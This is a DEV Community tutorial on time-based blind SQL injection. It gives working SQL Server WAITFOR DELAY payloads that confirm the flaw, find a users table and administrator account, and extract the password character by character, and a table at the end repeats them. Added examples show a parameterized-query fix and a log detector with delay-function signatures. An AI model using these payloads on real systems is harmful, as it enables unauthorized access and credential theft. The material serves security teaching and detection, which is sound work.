Posted on DEV Community by AK
🧪 Exploiting Blind SQL Injection by Triggering Time Delays

🎯 Objective

Demonstrate how to exploit a blind SQL injection vulnerability when:

  • The application does not return any visible output.
  • Error messages are suppressed or handled gracefully.
  • No conditional response difference is observed.

In such cases, we can use time-based blind SQL injection, where the attacker forces the database to wait (delay) for a certain amount of time depending on whether an injected condition is TRUE or FALSE.

This delay allows us to infer sensitive data one character at a time based on how long it takes for the HTTP response to arrive.

🔍 Key Concepts

1️⃣ Blind SQL Injection

A type of SQL injection where the attacker cannot see the results of their query. There's no direct output or error message returned from the application.

There are two main types:

  • Content-based blind SQLi: the application's behavior changes slightly depending on the result (for example, "Welcome back" vs. nothing).
  • Time-based blind SQLi: the application always behaves the same; only the response time reveals the result.

2️⃣ Time-Based Detection

When the application suppresses all output and errors, we force the database to pause using built-in functions like:

| DBMS | Delay function |
|---|---|
| SQL Server | WAITFOR DELAY '0:0:10' |
| MySQL | SLEEP(10) or BENCHMARK() |
| PostgreSQL | pg_sleep(10) |
| Oracle | DBMS_LOCK.SLEEP(10) |

If the HTTP response is delayed, it indicates that the injected condition was TRUE.

🛠️ Step-by-Step Attack Walkthrough

Let's assume we're targeting a vulnerable web application that uses a TrackingId cookie to perform a SQL query in the backend.

We suspect SQL injection is possible but:

  • No output is returned
  • No visible error messages
  • We observe no change in content or behavior

➡️ So we switch to time-based blind SQL injection.
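To make the backend concrete, here is an added example (not the post's code) of the kind of cookie lookup that makes such an application exploitable, beside its parameterized form. It uses an in-memory SQLite database; the `tracking` table, its columns and the sample ids are constructed for the example, and SQLite has no `WAITFOR`, so the point is only how the cookie value reaches the query and how binding it as a parameter makes the walkthrough's probes inert.

```python
"""
Vulnerable vs. parameterized TrackingId lookup (added illustration, not the
post's code). Table, column names and sample rows are assumptions.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway in-memory DB with a constructed tracking table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking (id TEXT PRIMARY KEY, visits INTEGER)")
    conn.executemany(
        "INSERT INTO tracking VALUES (?, ?)",
        [("u5YD3PapBctR9Ezu", 3), ("Kx7QmN1tVb2LpRsW", 1)],  # constructed ids
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, tracking_id: str) -> list:
    """The pattern the walkthrough exploits: the raw cookie is spliced into SQL,
    so a single quote in the cookie ends the literal and the rest becomes code."""
    sql = f"SELECT id, visits FROM tracking WHERE id = '{tracking_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, tracking_id: str) -> list:
    """Hardened form: the cookie travels as a bound parameter and is only ever
    compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT id, visits FROM tracking WHERE id = ?", (tracking_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"
    delay_probe = "x'; IF (1=1) WAITFOR DELAY '0:0:10'--"
    print("vulnerable, tautology :", lookup_vulnerable(db, tautology))  # every row
    print("safe, tautology       :", lookup_safe(db, tautology))        # []
    print("safe, delay probe     :", lookup_safe(db, delay_probe))      # []
    print("safe, real id         :", lookup_safe(db, "u5YD3PapBctR9Ezu"))
```

The difference between the two functions is the whole fix: with a bound parameter the database driver never sees the cookie as part of the statement text, so neither the tautology nor the time-delay probe changes which rows come back or how long the query takes.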

✅ Step 1: Confirm Vulnerability Using Time Delay

Test if we can trigger a delay with a known TRUE and FALSE condition.

📥 Payload (TRUE condition):

'; IF (1=1) WAITFOR DELAY '0:0:10'--

📥 Payload (FALSE condition):

'; IF (1=2) WAITFOR DELAY '0:0:10'--

💡 Result:

  • First request delays ~10 seconds → condition is TRUE
  • Second request returns immediately → condition is FALSE

✅ Confirmed: we can control execution timing via SQL conditions.

✅ Step 2: Test for Table Existence

Now test if the users table exists:

📥 Payload:

'; IF (SELECT COUNT(*) FROM users) > 0 WAITFOR DELAY '0:0:10'--

💡 Result:

  • If there is a 10-second delay, the users table exists ✅

✅ Step 3: Check for Administrator User

Next, check if the username 'administrator' exists in the users table.

📥 Payload:

'; IF (SELECT COUNT(*) FROM users WHERE username = 'administrator') > 0 WAITFOR DELAY '0:0:10'--

💡 Result:

  • Delay occurs → administrator user exists ✅

✅ Step 4: Extract Password Character by Character

Now extract the password one character at a time using SUBSTRING() and ASCII() comparisons.

📥 Payload (check if the first letter is > 'm', i.e. ASCII 109):

'; IF (SELECT COUNT(*) FROM users WHERE username = 'administrator' AND ASCII(SUBSTRING(password, 1, 1)) > 109) = 1 WAITFOR DELAY '0:0:10'--

🔁 Repeat this process for each character position and binary search through ASCII values (a-z, A-Z, 0-9) to determine the exact character.

You can automate this using:

  • Burp Intruder
  • Python script with requests + timing analysis

📊 Example: Binary Search Through Characters

Suppose we want to find the first character of the password:

  • Try 'a' to 'z' using timing differences.
  • Use binary search logic to narrow down faster.

Example payloads (written in shorthand; as in Step 4, the column reference actually has to sit inside the subquery against the users table):

'; IF (ASCII(SUBSTRING(password,1,1)) > 97) WAITFOR DELAY '0:0:10'--  # Is it after 'a'?
'; IF (ASCII(SUBSTRING(password,1,1)) > 100) WAITFOR DELAY '0:0:10'-- # Is it after 'd'?

Eventually, you'll pinpoint the correct character.
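From the defender's side, the same two facts that make this attack work are what make it detectable: the delay functions from the Key Concepts table have to appear literally in the injected input, and the character-by-character extraction just described produces many requests from one client with slightly different cookie values, a good share of which hit the injected delay. As an added example (not part of the original post), the following Python script runs both checks over constructed access-log lines. The log format, client addresses and cookie values are all made up for the example; the payload strings are the ones shown in this post.

```python
"""
Two complementary detectors for time-based blind SQLi (added example, not the
post's code): a signature check for DBMS delay functions in the TrackingId
cookie, and a per-client latency check for the extraction request pattern.
"""
import re
from collections import defaultdict

# Constructed access-log lines (not real traffic), one request per line:
# timestamp|client|path|TrackingId cookie value|status|duration_ms
LOG_LINES = [
    "2025-01-01T10:00:00Z|203.0.113.5|/filter|u5YD3PapBctR9Ezu|200|42",
    "2025-01-01T10:00:01Z|203.0.113.5|/filter|u5YD3PapBctR9Ezu'; IF (1=1) WAITFOR DELAY '0:0:10'--|200|10031",
    "2025-01-01T10:00:12Z|203.0.113.5|/filter|u5YD3PapBctR9Ezu'; IF (1=2) WAITFOR DELAY '0:0:10'--|200|40",
    "2025-01-01T10:00:13Z|203.0.113.5|/filter|u5YD3PapBctR9Ezu'; IF (ASCII(SUBSTRING(password,1,1)) > 97) WAITFOR DELAY '0:0:10'--|200|10044",
    "2025-01-01T10:00:24Z|203.0.113.5|/filter|u5YD3PapBctR9Ezu'; IF (ASCII(SUBSTRING(password,1,1)) > 100) WAITFOR DELAY '0:0:10'--|200|10052",
    "2025-01-01T10:01:00Z|198.51.100.7|/filter|Kx7QmN1tVb2LpRsW|200|55",
    "2025-01-01T10:01:30Z|198.51.100.7|/filter|Kx7QmN1tVb2LpRsW|200|8900",  # one slow but benign request
    "2025-01-01T10:02:00Z|192.0.2.9|/filter|zQ2' AND SLEEP(10)-- |200|10010",
    "2025-01-01T10:02:11Z|192.0.2.9|/filter|zQ2' AND pg_sleep(10)--|200|38",
]

# Delay functions from the Key Concepts table, keyed by the DBMS they belong to.
DELAY_SIGNATURES = {
    "SQL Server": re.compile(r"WAITFOR\s+DELAY", re.IGNORECASE),
    "MySQL": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE),
    "PostgreSQL": re.compile(r"\bpg_sleep\s*\(", re.IGNORECASE),
    "Oracle": re.compile(r"DBMS_LOCK\.SLEEP", re.IGNORECASE),
}


def parse(line: str) -> dict:
    """Split one constructed log line into its fields."""
    ts, client, path, cookie, status, ms = line.split("|")
    return {"ts": ts, "client": client, "path": path, "cookie": cookie,
            "status": int(status), "ms": int(ms)}


def signature_findings(lines) -> list:
    """Signature check: report (client, DBMS, timestamp) for every request whose
    cookie contains one of the known delay functions."""
    findings = []
    for rec in map(parse, lines):
        for dbms, pattern in DELAY_SIGNATURES.items():
            if pattern.search(rec["cookie"]):
                findings.append((rec["client"], dbms, rec["ts"]))
    return findings


def suspicious_clients(lines, slow_ms: int = 5000, min_slow: int = 2) -> list:
    """Behavioral check: flag clients that sent several requests slower than
    slow_ms AND used more than one cookie value. A binary search over ASCII
    values yields exactly this mix of fast and ~10 s responses from one client,
    while a single slow response from a client with a stable cookie is just a
    slow page."""
    stats = defaultdict(lambda: {"cookies": set(), "slow": 0})
    for rec in map(parse, lines):
        entry = stats[rec["client"]]
        entry["cookies"].add(rec["cookie"])
        if rec["ms"] >= slow_ms:
            entry["slow"] += 1
    return sorted(client for client, s in stats.items()
                  if s["slow"] >= min_slow and len(s["cookies"]) >= 2)


if __name__ == "__main__":
    for client, dbms, ts in signature_findings(LOG_LINES):
        print(f"{ts} {client}: delay function for {dbms} in TrackingId cookie")
    print("clients showing extraction pattern:", suspicious_clients(LOG_LINES))
```

In the sample data the two checks disagree in a useful way: 192.0.2.9 trips the signature check on its first probe while still below the latency threshold, and 198.51.100.7 has one slow response but a stable cookie and is left alone. Tuning `slow_ms` toward the delay an attacker would choose (the post uses 10 seconds) and `min_slow` to the tolerance for slow pages on the endpoint is what keeps the behavioral check from paging on ordinary latency.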

🧾 Summary of Key Queries

| Purpose | Payload |
|---|---|
| Confirm SQLi | ' |
| Trigger delay (TRUE) | '; IF (1=1) WAITFOR DELAY '0:0:10'-- |
| Trigger delay (FALSE) | '; IF (1=2) WAITFOR DELAY '0:0:10'-- |
| Check table existence | '; IF (SELECT COUNT(*) FROM users) > 0 WAITFOR DELAY '0:0:10'-- |
| Check admin user | '; IF (SELECT COUNT(*) FROM users WHERE username='administrator') > 0 WAITFOR DELAY '0:0:10'-- |
| Extract password char | '; IF (ASCII(SUBSTRING(password,1,1)) > 100) WAITFOR DELAY '0:0:10'-- |

🧠 Takeaways

  • When no output or error is available, time-based SQL injection is your best bet.
  • Use built-in delay functions specific to the database engine.
  • Use binary search to speed up password extraction.
  • Automate testing with Burp Intruder or custom scripts.
  • Even without seeing output, you can infer secrets via timing side channels.

🏁 Final Notes

Time-based SQL injection is a powerful technique for exploiting silent vulnerabilities. While slower than other methods, it works even when:

  • Output is completely suppressed.
  • Errors are handled gracefully.
  • The application shows no visible change.

With patience and automation, attackers can extract full databases, including usernames, passwords, and API keys, just by measuring how long it takes for a server to respond.

🙌 Final Words

Great job understanding and applying time-based blind SQL injection! You've now mastered one of the most stealthy and effective techniques in ethical hacking.

Happy hacking! 💻⚡🕵️‍♂️

🧷 Tags: #SQLInjection #BlindSQLi #TimeBasedSQLi #WebSecurity #CTFWriteup #BugBounty #EthicalHacking
